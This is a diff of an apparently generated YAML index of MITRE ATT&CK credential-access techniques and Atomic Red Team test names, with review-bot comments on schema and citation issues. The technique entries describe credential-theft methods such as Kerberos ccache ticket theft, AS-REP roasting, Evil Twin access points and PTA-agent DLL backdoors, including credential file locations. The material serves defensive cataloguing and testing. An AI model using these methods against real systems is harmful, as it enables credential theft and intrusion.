+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1556.002
atomic_tests:
- name: Install and Register Password Filter DLL
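Review bot: `x_mitre_permissions_required` with `Administrator` and `SYSTEM` is removed from T1556.002 and `x_mitre_version` moves from 2.0 to 2.1; after this change the prerequisite is recorded only by the atomic test's `elevation_required: true` at the end of this technique's tests, so documentation built from the technique object alone will no longer state that registering a password filter DLL needs administrative rights. If the field is being retired wholesale, consider carrying the requirement into the test's description so it is not lost.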
@@ -74519,58 +75161,89 @@ credential-access:
remove-item C:\Windows\System32\#{dll_name}
name: powershell
elevation_required: true
- T1558.004:
- technique:
- x_mitre_platforms:
- - Windows
+ T1558.005:
+ technique:
+ modified: '2024-10-14T21:26:37.856Z'
+ name: Ccache Files
+ description: "\nAdversaries may attempt to steal Kerberos tickets stored in
+ credential cache files (or ccache). These files are used for short term storage
+ of a user's active session credentials. The ccache file is created upon user
+ authentication and allows for access to multiple services without the user
+ having to re-enter credentials. \n\nThe /etc/krb5.conf
configuration
+ file and the KRB5CCNAME
environment variable are used to set
+ the storage location for ccache entries. On Linux, credentials are typically
+ stored in the `/tmp` directory with a naming format of `krb5cc_%UID%` or `krb5.ccache`.
+ On macOS, ccache entries are stored by default in memory with an `API:{uuid}`
+ naming scheme. Typically, users interact with ticket storage using kinit
,
+ which obtains a Ticket-Granting-Ticket (TGT) for the principal; klist
,
+ which lists obtained tickets currently held in the credentials cache; and
+ other built-in binaries.(Citation: Kerberos GNU/Linux)(Citation: Binary Defense
+ Kerberos Linux)\n\nAdversaries can collect tickets from ccache files stored
+ on disk and authenticate as the current user without their password to perform
+ [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003) attacks.
+ Adversaries can also use these tickets to impersonate legitimate users with
+ elevated privileges to perform [Privilege Escalation](https://attack.mitre.org/tactics/TA0004).
+ Tools like Kekeo can also be used by adversaries to convert ccache files to
+ Windows format for further [Lateral Movement](https://attack.mitre.org/tactics/TA0008).
+ On macOS, adversaries may use open-source tools or the Kerberos framework
+ to interact with ccache files and extract TGTs or Service Tickets via lower-level
+ APIs.(Citation: SpectorOps Bifrost Kerberos macOS 2019)(Citation: Linux Kerberos
+ Tickets)(Citation: Brining MimiKatz to Unix)(Citation: Kekeo) "
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: credential-access
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
- x_mitre_contributors:
- - Yossi Nisani, Cymptom
- - James Dunn, @jamdunnDFW, EY
- - Swapnil Kumbhar
- - Jacques Pluviose, @Jacqueswildy_IT
- - Dan Nutting, @KerberToast
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--3986e7fd-a8e9-4ecb-bfc6-55920855912b
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'File: File Access'
type: attack-pattern
- created: '2020-08-24T13:43:00.028Z'
+ id: attack-pattern--394220d9-8efc-4252-9040-664f7b115be6
+ created: '2024-09-17T15:02:31.324Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1558.004
- url: https://attack.mitre.org/techniques/T1558/004
- - source_name: Harmj0y Roasting AS-REPs Jan 2017
- url: http://www.harmj0y.net/blog/activedirectory/roasting-as-reps/
- description: HarmJ0y. (2017, January 17). Roasting AS-REPs. Retrieved August
- 24, 2020.
- - source_name: Microsoft Kerberos Preauth 2014
- url: https://social.technet.microsoft.com/wiki/contents/articles/23559.kerberos-pre-authentication-why-it-should-not-be-disabled.aspx
- description: 'Sanyal, M.. (2014, March 18). Kerberos Pre-Authentication: Why
- It Should Not Be Disabled. Retrieved August 25, 2020.'
- - source_name: Stealthbits Cracking AS-REP Roasting Jun 2019
- url: https://blog.stealthbits.com/cracking-active-directory-passwords-with-as-rep-roasting/
- description: Jeff Warren. (2019, June 27). Cracking Active Directory Passwords
- with AS-REP Roasting. Retrieved August 24, 2020.
- - description: Medin, T. (2014, November). Attacking Kerberos - Kicking the
- Guard Dog of Hades. Retrieved March 22, 2018.
- source_name: SANS Attacking Kerberos Nov 2014
- url: https://redsiege.com/kerberoast-slides
- - url: https://adsecurity.org/?p=2293
- description: Metcalf, S. (2015, December 31). Cracking Kerberos TGS Tickets
- Using Kerberoast – Exploiting Kerberos to Compromise the Active Directory
- Domain. Retrieved March 22, 2018.
- source_name: AdSecurity Cracking Kerberos Dec 2015
- - url: https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/
- description: Bani, M. (2018, February 23). Detecting Kerberoasting activity
- using Azure Security Center. Retrieved March 23, 2018.
- source_name: Microsoft Detecting Kerberoasting Feb 2018
- - source_name: Microsoft 4768 TGT 2017
- url: https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4768
- description: 'Microsoft. (2017, April 19). 4768(S, F): A Kerberos authentication
- ticket (TGT) was requested. Retrieved August 24, 2020.'
- modified: '2021-06-07T19:23:33.039Z'
+ url: https://attack.mitre.org/techniques/T1558/005
+ external_id: T1558.005
+ - source_name: Binary Defense Kerberos Linux
+ description: " ARC Labs, Dwyer, John. Gonzalez, Eric. Hudak, Tyler. (2024,
+ October 1). Shining a Light in the Dark – How Binary Defense Uncovered an
+ APT Lurking in Shadows of IT. Retrieved October 7, 2024."
+ url: https://www.binarydefense.com/resources/blog/shining-a-light-in-the-dark-how-binary-defense-uncovered-an-apt-lurking-in-shadows-of-it/
+ - source_name: Kerberos GNU/Linux
+ description: Adepts of 0xCC. (2021, January 28). The Kerberos Credential Thievery
+ Compendium (GNU/Linux). Retrieved September 17, 2024.
+ url: https://adepts.of0x.cc/kerberos-thievery-linux/
+ - source_name: Kekeo
+ description: Benjamin Delpy. (n.d.). Kekeo. Retrieved October 4, 2021.
+ url: https://github.com/gentilkiwi/kekeo
+ - source_name: SpectorOps Bifrost Kerberos macOS 2019
+ description: Cody Thomas. (2019, November 14). When Kirbi walks the Bifrost.
+ Retrieved October 6, 2021.
+ url: https://posts.specterops.io/when-kirbi-walks-the-bifrost-4c727807744f
+ - source_name: Brining MimiKatz to Unix
+ description: Tim Wadhwa-Brown. (2018, November). Where 2 worlds collide Bringing
+ Mimikatz et al to UNIX. Retrieved October 13, 2021.
+ url: https://labs.portcullis.co.uk/download/eu-18-Wadhwa-Brown-Where-2-worlds-collide-Bringing-Mimikatz-et-al-to-UNIX.pdf
+ - source_name: Linux Kerberos Tickets
+ description: Trevor Haskell. (2020, April 1). Kerberos Tickets on Linux Red
+ Teams. Retrieved October 4, 2021.
+ url: https://www.fireeye.com/blog/threat-research/2020/04/kerberos-tickets-on-linux-red-teams.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1558.004:
+ technique:
+ modified: '2024-10-15T15:32:07.850Z'
name: 'Steal or Forge Kerberos Tickets: AS-REP Roasting'
description: "Adversaries may reveal credentials of accounts that have disabled
Kerberos preauthentication by [Password Cracking](https://attack.mitre.org/techniques/T1110/002)
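Review bot: The new T1558.005 (Ccache Files) entry is added with `x_mitre_detection: ''` and `atomic_tests: []`; an empty detection string is what the upstream object carries, but anything that renders detection guidance from this file should treat `''` the same as a missing key rather than emit an empty section. Two small data issues in the added block: the `description` literal starts with "\n" and ends with a trailing space before the closing quote, and the reference key `Brining MimiKatz to Unix` is misspelled both in the inline `(Citation: Brining MimiKatz to Unix)` and in the `source_name`; if it is corrected, both must change together or the citation breaks. Because T1558.005 is inserted ahead of T1558.004, git pairs the old T1558.004 reference list with the new entry's lines, so the hunk reads as a rewrite of T1558.004 when that entry is only being re-emitted below; appending the new entry after T1558.004 would keep the diff reviewable.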
@@ -74605,6 +75278,13 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_contributors:
+ - Yossi Nisani, Cymptom
+ - James Dunn, @jamdunnDFW, EY
+ - Swapnil Kumbhar
+ - Jacques Pluviose, @Jacqueswildy_IT
+ - Dan Nutting, @KerberToast
+ x_mitre_deprecated: false
x_mitre_detection: 'Enable Audit Kerberos Service Ticket Operations to log Kerberos
TGS service ticket requests. Particularly investigate irregular patterns of
activity (ex: accounts making numerous requests, Event ID 4768 and 4769, within
@@ -74612,17 +75292,58 @@ credential-access:
pre-authentication not required [Type: 0x0]).(Citation: AdSecurity Cracking
Kerberos Dec 2015)(Citation: Microsoft Detecting Kerberoasting Feb 2018)(Citation:
Microsoft 4768 TGT 2017)'
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Active Directory: Active Directory Credential Request'
- x_mitre_permissions_required:
- - User
x_mitre_system_requirements:
- Valid domain account
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--3986e7fd-a8e9-4ecb-bfc6-55920855912b
+ created: '2020-08-24T13:43:00.028Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1558/004
+ external_id: T1558.004
+ - source_name: Microsoft Detecting Kerberoasting Feb 2018
+ description: Bani, M. (2018, February 23). Detecting Kerberoasting activity
+ using Azure Security Center. Retrieved March 23, 2018.
+ url: https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/
+ - source_name: Harmj0y Roasting AS-REPs Jan 2017
+ description: HarmJ0y. (2017, January 17). Roasting AS-REPs. Retrieved September
+ 23, 2024.
+ url: https://blog.harmj0y.net/activedirectory/roasting-as-reps/
+ - source_name: Stealthbits Cracking AS-REP Roasting Jun 2019
+ description: Jeff Warren. (2019, June 27). Cracking Active Directory Passwords
+ with AS-REP Roasting. Retrieved August 24, 2020.
+ url: https://blog.stealthbits.com/cracking-active-directory-passwords-with-as-rep-roasting/
+ - source_name: SANS Attacking Kerberos Nov 2014
+ description: Medin, T. (2014, November). Attacking Kerberos - Kicking the
+ Guard Dog of Hades. Retrieved March 22, 2018.
+ url: https://redsiege.com/kerberoast-slides
+ - source_name: AdSecurity Cracking Kerberos Dec 2015
+ description: Metcalf, S. (2015, December 31). Cracking Kerberos TGS Tickets
+ Using Kerberoast – Exploiting Kerberos to Compromise the Active Directory
+ Domain. Retrieved March 22, 2018.
+ url: https://adsecurity.org/?p=2293
+ - source_name: Microsoft 4768 TGT 2017
+ description: 'Microsoft. (2017, April 19). 4768(S, F): A Kerberos authentication
+ ticket (TGT) was requested. Retrieved August 24, 2020.'
+ url: https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4768
+ - source_name: Microsoft Kerberos Preauth 2014
+ description: 'Sanyal, M.. (2014, March 18). Kerberos Pre-Authentication: Why
+ It Should Not Be Disabled. Retrieved August 25, 2020.'
+ url: https://social.technet.microsoft.com/wiki/contents/articles/23559.kerberos-pre-authentication-why-it-should-not-be-disabled.aspx
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1558.004
atomic_tests:
- name: Rubeus asreproast
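Review bot: two silent schema changes in this hunk should be called out in the commit message, because anything that reads the index by field name will notice them: `x_mitre_permissions_required` is dropped (L362244-245) and `spec_version` is dropped (L362248), and both removals recur for every technique in the patch. Separately, `x_mitre_attack_spec_version` and `x_mitre_modified_by_ref` are appended after `object_marking_refs` here (L362290-291), while the T1552 hunk places the same two keys in alphabetical position among the other `x_mitre_*` keys (L362406, L362414); pick one ordering in the generator, otherwise the next regeneration will show these keys moving again.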
@@ -74708,17 +75429,12 @@ credential-access:
name: powershell
T1558:
technique:
- modified: '2024-03-01T16:58:02.395Z'
+ modified: '2024-09-17T19:49:11.455Z'
name: Steal or Forge Kerberos Tickets
description: |
Adversaries may attempt to subvert Kerberos authentication by stealing or forging Kerberos tickets to enable [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003). Kerberos is an authentication protocol widely used in modern Windows domain environments. In Kerberos environments, referred to as “realms”, there are three basic participants: client, service, and Key Distribution Center (KDC).(Citation: ADSecurity Kerberos Ring Decoder) Clients request access to a service and through the exchange of Kerberos tickets, originating from KDC, they are granted access after having successfully authenticated. The KDC is responsible for both authentication and ticket granting. Adversaries may attempt to abuse Kerberos by stealing tickets or forging tickets to enable unauthorized access.
On Windows, the built-in klist
utility can be used to list and analyze cached Kerberos tickets.(Citation: Microsoft Klist)
-
- Linux systems on Active Directory domains store Kerberos credentials locally in the credential cache file referred to as the "ccache". The credentials are stored in the ccache file while they remain valid and generally while a user's session lasts.(Citation: MIT ccache) On modern Redhat Enterprise Linux systems, and derivative distributions, the System Security Services Daemon (SSSD) handles Kerberos tickets. By default SSSD maintains a copy of the ticket database that can be found in /var/lib/sss/secrets/secrets.ldb
as well as the corresponding key located in /var/lib/sss/secrets/.secrets.mkey
. Both files require root access to read. If an adversary is able to access the database and key, the credential cache Kerberos blob can be extracted and converted into a usable Kerberos ccache file that adversaries may use for [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003). The ccache file may also be converted into a Windows format using tools such as Kekeo.(Citation: Linux Kerberos Tickets)(Citation: Brining MimiKatz to Unix)(Citation: Kekeo)
-
-
- Kerberos tickets on macOS are stored in a standard ccache format, similar to Linux. By default, access to these ccache entries is federated through the KCM daemon process via the Mach RPC protocol, which uses the caller's environment to determine access. The storage location for these ccache entries is influenced by the /etc/krb5.conf
configuration file and the KRB5CCNAME
environment variable which can specify to save them to disk or keep them protected via the KCM daemon. Users can interact with ticket storage using kinit
, klist
, ktutil
, and kcc
built-in binaries or via Apple's native Kerberos framework. Adversaries can use open source tools to interact with the ccache files directly or to use the Kerberos framework to call lower-level APIs for extracting the user's TGT or Service Tickets.(Citation: SpectorOps Bifrost Kerberos macOS 2019)(Citation: macOS kerberos framework MIT)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
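Review bot: the T1558 description loses its Linux (ccache, SSSD `secrets.ldb`) and macOS (KCM, `KRB5CCNAME`) paragraphs and now only describes Windows `klist`, yet the platform list that follows in the next hunk still carries Linux and macOS (L362323-325). That is defensible if the platform-specific content now lives in a sub-technique, but the patch gives no pointer to it, so add one line to the commit message saying where that text went and why the version bump is 1.5 to 1.6 rather than a larger one for a description rewrite of this size.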
@@ -74754,7 +75470,7 @@ credential-access:
- Windows
- Linux
- macOS
- x_mitre_version: '1.5'
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Logon Session: Logon Session Metadata'
@@ -74779,13 +75495,6 @@ credential-access:
description: Bani, M. (2018, February 23). Detecting Kerberoasting activity
using Azure Security Center. Retrieved March 23, 2018.
url: https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/
- - source_name: Kekeo
- description: Benjamin Delpy. (n.d.). Kekeo. Retrieved October 4, 2021.
- url: https://github.com/gentilkiwi/kekeo
- - source_name: SpectorOps Bifrost Kerberos macOS 2019
- description: Cody Thomas. (2019, November 14). When Kirbi walks the Bifrost.
- Retrieved October 6, 2021.
- url: https://posts.specterops.io/when-kirbi-walks-the-bifrost-4c727807744f
- source_name: Medium Detecting Attempts to Steal Passwords from Memory
description: French, D. (2018, October 2). Detecting Attempts to Steal Passwords
from Memory. Retrieved October 11, 2019.
@@ -74794,14 +75503,6 @@ credential-access:
description: Jeff Warren. (2019, February 19). How to Detect Pass-the-Ticket
Attacks. Retrieved February 27, 2020.
url: https://blog.stealthbits.com/detect-pass-the-ticket-attacks
- - source_name: macOS kerberos framework MIT
- description: Massachusetts Institute of Technology. (2007, October 27). Kerberos
- for Macintosh Preferences Documentation. Retrieved October 6, 2021.
- url: http://web.mit.edu/macdev/KfM/Common/Documentation/preferences.html
- - source_name: MIT ccache
- description: 'Massachusetts Institute of Technology. (n.d.). MIT Kerberos
- Documentation: Credential Cache. Retrieved October 4, 2021.'
- url: https://web.mit.edu/kerberos/krb5-1.12/doc/basic/ccache_def.html
- source_name: AdSecurity Cracking Kerberos Dec 2015
description: Metcalf, S. (2015, December 31). Cracking Kerberos TGS Tickets
Using Kerberoast – Exploiting Kerberos to Compromise the Active Directory
@@ -74823,23 +75524,14 @@ credential-access:
description: Sean Metcalf. (2014, September 12). Kerberos, Active Directory’s
Secret Decoder Ring. Retrieved February 27, 2020.
url: https://adsecurity.org/?p=227
- - source_name: Brining MimiKatz to Unix
- description: Tim Wadhwa-Brown. (2018, November). Where 2 worlds collide Bringing
- Mimikatz et al to UNIX. Retrieved October 13, 2021.
- url: https://labs.portcullis.co.uk/download/eu-18-Wadhwa-Brown-Where-2-worlds-collide-Bringing-Mimikatz-et-al-to-UNIX.pdf
- - source_name: Linux Kerberos Tickets
- description: Trevor Haskell. (2020, April 1). Kerberos Tickets on Linux Red
- Teams. Retrieved October 4, 2021.
- url: https://www.fireeye.com/blog/threat-research/2020/04/kerberos-tickets-on-linux-red-teams.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
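Review bot: the two references removed here, `Brining MimiKatz to Unix` (L362364-367) and `Linux Kerberos Tickets` (L362368-371), are the same entries added to the new technique block at the top of this patch (L362200-204), so this is a move between techniques rather than a deletion; say so in the commit message. Leave the misspelled `source_name` `Brining MimiKatz to Unix` as it is: it is a citation key that has to match the `(Citation: ...)` tag byte-for-byte wherever the description uses it, and correcting it in one place would orphan the other.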
T1555:
technique:
- modified: '2024-02-26T14:19:09.417Z'
+ modified: '2024-10-15T14:57:46.850Z'
name: Credentials from Password Stores
description: 'Adversaries may search for common password storage locations to
obtain user credentials.(Citation: F-Secure The Dukes) Passwords are stored
@@ -74890,7 +75582,6 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1555
atomic_tests:
- name: Extract Windows Credential Manager via VBA
@@ -75018,7 +75709,7 @@ credential-access:
name: powershell
T1552:
technique:
- modified: '2024-04-15T21:33:12.892Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Unsecured Credentials
description: 'Adversaries may search compromised systems to find and obtain
insecurely stored credentials. These credentials can be stored and/or misplaced
@@ -75030,6 +75721,7 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Austin Clark, @c2defense
x_mitre_deprecated: false
@@ -75044,18 +75736,18 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '1.3'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Access'
- 'Application Log: Application Log Content'
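Review bot: the platform substitution at L362417-418, L362423 and L362427-428 replaces `Azure AD`, `Office 365` and `Google Workspace` with `Office Suite` and `Identity Provider`. Any per-platform index derived from `x_mitre_platforms` changes membership as a result, so confirm that every generated index file was rebuilt in the same change and that nothing downstream still filters on the three old platform names; a version bump from 1.3 to 1.4 (L362426, L362429) alone does not make that visible to consumers.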
@@ -75078,9 +75770,6 @@ credential-access:
url: https://labs.portcullis.co.uk/download/eu-18-Wadhwa-Brown-Where-2-worlds-collide-Bringing-Mimikatz-et-al-to-UNIX.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1552
atomic_tests:
- name: Search for Passwords in Powershell History
@@ -75097,32 +75786,113 @@ credential-access:
'
name: powershell
elevation_required: true
+ T1557.004:
+ technique:
+ modified: '2024-11-11T18:52:53.686Z'
+ name: Evil Twin
+ description: "Adversaries may host seemingly genuine Wi-Fi access points to
+ deceive users into connecting to malicious networks as a way of supporting
+ follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040),
+ [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002),
+ or [Input Capture](https://attack.mitre.org/techniques/T1056).(Citation: Australia
+ ‘Evil Twin’)\n\nBy using a Service Set Identifier (SSID) of a legitimate Wi-Fi
+ network, fraudulent Wi-Fi access points may trick devices or users into connecting
+ to malicious Wi-Fi networks.(Citation: Kaspersky evil twin)(Citation: medium
+ evil twin) Adversaries may provide a stronger signal strength or block access
+ to Wi-Fi access points to coerce or entice victim devices into connecting
+ to malicious networks.(Citation: specter ops evil twin) A Wi-Fi Pineapple
+ – a network security auditing and penetration testing tool – may be deployed
+ in Evil Twin attacks for ease of use and broader range. Custom certificates
+ may be used in an attempt to intercept HTTPS traffic. \n\nSimilarly, adversaries
+ may also listen for client devices sending probe requests for known or previously
+ connected networks (Preferred Network Lists or PNLs). When a malicious access
+ point receives a probe request, adversaries can respond with the same SSID
+ to imitate the trusted, known network.(Citation: specter ops evil twin) Victim
+ devices are led to believe the responding access point is from their PNL and
+ initiate a connection to the fraudulent network.\n\nUpon logging into the
+ malicious Wi-Fi access point, a user may be directed to a fake login page
+ or captive portal webpage to capture the victim’s credentials. Once a user
+ is logged into the fraudulent Wi-Fi network, the adversary may able to monitor
+ network activity, manipulate data, or steal additional credentials. Locations
+ with high concentrations of public Wi-Fi access, such as airports, coffee
+ shops, or libraries, may be targets for adversaries to set up illegitimate
+ Wi-Fi access points. "
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: credential-access
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ x_mitre_contributors:
+ - Menachem Goldstein
+ - DeFord L. Smith
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Network
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Network Traffic: Network Traffic Content'
+ - 'Network Traffic: Network Traffic Flow'
+ type: attack-pattern
+ id: attack-pattern--48b836c6-e4ca-435a-82a3-29c03e5b492e
+ created: '2024-09-17T14:27:40.947Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1557/004
+ external_id: T1557.004
+ - source_name: Kaspersky evil twin
+ description: AO Kaspersky Lab. (n.d.). Evil twin attacks and how to prevent
+ them. Retrieved September 17, 2024.
+ url: https://usa.kaspersky.com/resource-center/preemptive-safety/evil-twin-attacks
+ - source_name: medium evil twin
+ description: Gihan, Kavishka. (2021, August 8). Wireless Security— Evil Twin
+ Attack. Retrieved September 17, 2024.
+ url: https://kavigihan.medium.com/wireless-security-evil-twin-attack-d3842f4aef59
+ - source_name: specter ops evil twin
+ description: Ryan, Gabriel. (2019, October 28). Modern Wireless Tradecraft
+ Pt I — Basic Rogue AP Theory — Evil Twin and Karma Attacks. Retrieved September
+ 17, 2024.
+ url: https://posts.specterops.io/modern-wireless-attacks-pt-i-basic-rogue-ap-theory-evil-twin-and-karma-attacks-35a8571550ee
+ - source_name: Australia ‘Evil Twin’
+ description: Toulas, Bill. (2024, July 1). Australian charged for ‘Evil Twin’
+ WiFi attack on plane. Retrieved September 17, 2024.
+ url: https://www.bleepingcomputer.com/news/security/australian-charged-for-evil-twin-wifi-attack-on-plane/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
T1556.007:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Hybrid Identity
description: "Adversaries may patch, modify, or otherwise backdoor cloud authentication
processes that are tied to on-premises user identities in order to bypass
typical authentication mechanisms, access credentials, and enable persistent
access to accounts. \n\nMany organizations maintain hybrid user and device
identities that are shared between on-premises and cloud-based environments.
- These can be maintained in a number of ways. For example, Azure AD includes
- three options for synchronizing identities between Active Directory and Azure
- AD(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
+ These can be maintained in a number of ways. For example, Microsoft Entra
+ ID includes three options for synchronizing identities between Active Directory
+ and Entra ID(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
(PHS), in which a privileged on-premises account synchronizes user password
- hashes between Active Directory and Azure AD, allowing authentication to Azure
- AD to take place entirely in the cloud \n* Pass Through Authentication (PTA),
- in which Azure AD authentication attempts are forwarded to an on-premises
+ hashes between Active Directory and Entra ID, allowing authentication to Entra
+ ID to take place entirely in the cloud \n* Pass Through Authentication (PTA),
+ in which Entra ID authentication attempts are forwarded to an on-premises
PTA agent, which validates the credentials against Active Directory \n* Active
Directory Federation Services (AD FS), in which a trust relationship is established
- between Active Directory and Azure AD \n\nAD FS can also be used with other
+ between Active Directory and Entra ID \n\nAD FS can also be used with other
SaaS and cloud platforms such as AWS and GCP, which will hand off the authentication
process to AD FS and receive a token containing the hybrid users’ identity
and privileges. \n\nBy modifying authentication processes tied to hybrid identities,
an adversary may be able to establish persistent privileged access to cloud
resources. For example, adversaries who compromise an on-premises server running
a PTA agent may inject a malicious DLL into the `AzureADConnectAuthenticationAgentService`
- process that authorizes all attempts to authenticate to Azure AD, as well
+ process that authorizes all attempts to authenticate to Entra ID, as well
as records user credentials.(Citation: Azure AD Connect for Read Teamers)(Citation:
AADInternals Azure AD On-Prem to Cloud) In environments using AD FS, an adversary
may edit the `Microsoft.IdentityServer.Servicehost` configuration file to
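Review bot: the new T1557.004 entry ships with `x_mitre_detection: ''` (L362487), so any view of the index that prints detection guidance will render blank for this technique and the only detection hint is the two data sources at L362495-496; worth a note in the commit message so nobody files this as a generator bug. Also, the `source_name` `Australia ‘Evil Twin’` at L362519 contains typographic quotes and must match the `(Citation: Australia ‘Evil Twin’)` tag in the description at L362455-456 exactly; if the pipeline ever normalizes quotes on either side, this is the key that breaks first.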
@@ -75130,9 +75900,9 @@ credential-access:
any set of claims, thereby bypassing multi-factor authentication and defined
AD FS policies.(Citation: MagicWeb)\n\nIn some cases, adversaries may be able
to modify the hybrid identity authentication process from the cloud. For example,
- adversaries who compromise a Global Administrator account in an Azure AD tenant
+ adversaries who compromise a Global Administrator account in an Entra ID tenant
may be able to register a new PTA agent via the web console, similarly allowing
- them to harvest credentials and log into the Azure AD environment as any user.(Citation:
+ them to harvest credentials and log into the Entra ID environment as any user.(Citation:
Mandiant Azure AD Backdoors)"
kill_chain_phases:
- kill_chain_name: mitre-attack
@@ -75141,21 +75911,22 @@ credential-access:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_contributors:
+ - Praetorian
+ x_mitre_deprecated: false
x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- SaaS
- - Google Workspace
- - Office 365
- IaaS
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
- x_mitre_domains:
- - enterprise-attack
- x_mitre_version: '1.0'
- x_mitre_contributors:
- - Praetorian
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'File: File Modification'
- 'Module: Module Load'
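Review bot: this hunk hides an `x_mitre_attack_spec_version` bump inside a key reorder: the value is added as 3.2.0 at L362582, and the old 2.1.0 is only removed in the next hunk (L362615), so a reader scanning either hunk alone sees a move rather than a version change. The same applies to the platform substitution (L362593, L362595-596 removed; L362605-606 added) as in T1552; the two changes together justify the 1.0 to 1.1 bump at L362602/L362607, but the commit message should list both.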
@@ -75195,55 +75966,10 @@ credential-access:
url: https://www.mandiant.com/resources/detecting-microsoft-365-azure-active-directory-backdoors
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1555.003:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Ryan Benson, Exabeam
- - Barry Shteiman, Exabeam
- - Sylvain Gil, Exabeam
- - RedHuntLabs, @redhuntlabs
- object_marking_refs:
